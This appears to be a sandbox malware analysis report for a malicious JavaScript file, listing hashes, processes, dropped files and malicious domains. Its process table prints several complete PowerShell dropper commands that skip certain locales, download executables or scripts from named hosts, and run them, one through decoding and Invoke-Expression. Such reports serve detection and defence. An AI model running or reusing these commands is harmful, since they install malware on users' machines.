File name: | Restructura_Torino_Novembre2019 2019 06050316583311 xm.js |
Full analysis: | https://app.any.run/tasks/d3bbc84d-6ba8-4c31-a200-eb62c5a089e9 |
Verdict: | Malicious activity |
Analysis date: | March 21, 2019, 15:13:01 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with CRLF, LF line terminators |
MD5: | D10081172E8B798A5C1B7F4EB15D26A6 |
SHA1: | B4105600320925EEBC366F4F44293D114039D827 |
SHA256: | B27E6BF73D4B1456AC50DAF67CE728C8A1FBC1D07C9BE1D163596DCDEC60C047 |
SSDEEP: | 192:2nbbxRvZ9BswCOCY4pTnDcojaTnfQFFtWJjuZ5YJPitAjTifYP4q:2lsbjjGfstW4Z9MTsYAq |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2712 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Restructura_Torino_Novembre2019 2019 06050316583311 xm.js" | C:\Windows\System32\WScript.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
4064 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" if( (Get-UICulture).Name -match 'RU|UA|BY|CN'){ exit; } $bvyxv = [System.IO.Path]::GetTempPath() + '\SearchI32.js'; ( New-Object System.Net.WebClient ).DownloadFile('http://cloud.kokoheadattorney.com/502?ycyjheadezafitzhwh',$bvyxv); Start-Process $bvyxv; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WScript.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2220 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" if( (Get-UICulture).Name -match 'RU|UA|BY|CN'){ exit; } $iezwjdihceegvxh = [System.IO.Path]::GetTempPath() +'\..' +'\' + 'Dke.exe'; ( New-Object System.Net.WebClient ).DownloadFile('http://cloud.kokoheadattorney.com/501?fhigcxjwfvehg',$iezwjdihceegvxh); Start-Process $iezwjdihceegvxh; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WScript.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1708 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\SearchI32.js" | C:\Windows\System32\WScript.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
2316 | "C:\Windows\system32\ntvdm.exe" -i1 | C:\Windows\system32\ntvdm.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: NTVDM.EXE Exit code: 3221225477 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3412 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" if( (Get-UICulture).Name -match 'RU|UA|BY|CN'){ exit; } $sxtywszfjtzczixzjg = [System.IO.Path]::GetTempPath() + '\SearchI32.txt';$vdbsbvceuvayxftwebhu = ''; ( New-Object System.Net.WebClient ).DownloadFile('http://cdn.zaczvk.pl/crypt0DD1D2637FDB71097213D70B94E86930.php',$sxtywszfjtzczixzjg);;Get-Content $sxtywszfjtzczixzjg | Where-Object {$_ -match $regex} | ForEach-Object { $vdbsbvceuvayxftwebhu += $_ -replace '..(.)','$1'} ;Invoke-Expression -Command $vdbsbvceuvayxftwebhu; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WScript.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
4064 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9ZCYSP5HMI8QD991DNUH.temp | — | |
MD5:— | SHA256:— | |||
2220 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N3M37PR26CRM42AST27M.temp | — | |
MD5:— | SHA256:— | |||
3412 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CSP281VN7APUUQ0ZL3M1.temp | — | |
MD5:— | SHA256:— | |||
4064 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFffbfa.TMP | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
2220 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFffc0a.TMP | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
3412 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF100419.TMP | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
2220 | powershell.exe | C:\Users\admin\AppData\Local\Dke.exe | text | |
MD5:905F2BB7E8852FB96CB9AEFF9568A839 | SHA256:792376C209F338959BE4CF00C54DBF82662B90516082E23106FAEC4C43C69E49 | |||
3412 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
2220 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
4064 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2220 | powershell.exe | GET | 200 | 31.214.157.69:80 | http://cloud.kokoheadattorney.com/501?fhigcxjwfvehg | NL | text | 4 b | malicious |
4064 | powershell.exe | GET | 200 | 31.214.157.69:80 | http://cloud.kokoheadattorney.com/502?ycyjheadezafitzhwh | NL | text | 9.77 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3412 | powershell.exe | 185.158.250.114:80 | cdn.zaczvk.pl | M247 Ltd | NL | malicious |
4064 | powershell.exe | 31.214.157.69:80 | cloud.kokoheadattorney.com | easystores GmbH | NL | suspicious |
2220 | powershell.exe | 31.214.157.69:80 | cloud.kokoheadattorney.com | easystores GmbH | NL | suspicious |
Domain | IP | Reputation |
---|---|---|
cloud.kokoheadattorney.com |
| malicious |
cdn.zaczvk.pl |
| unknown |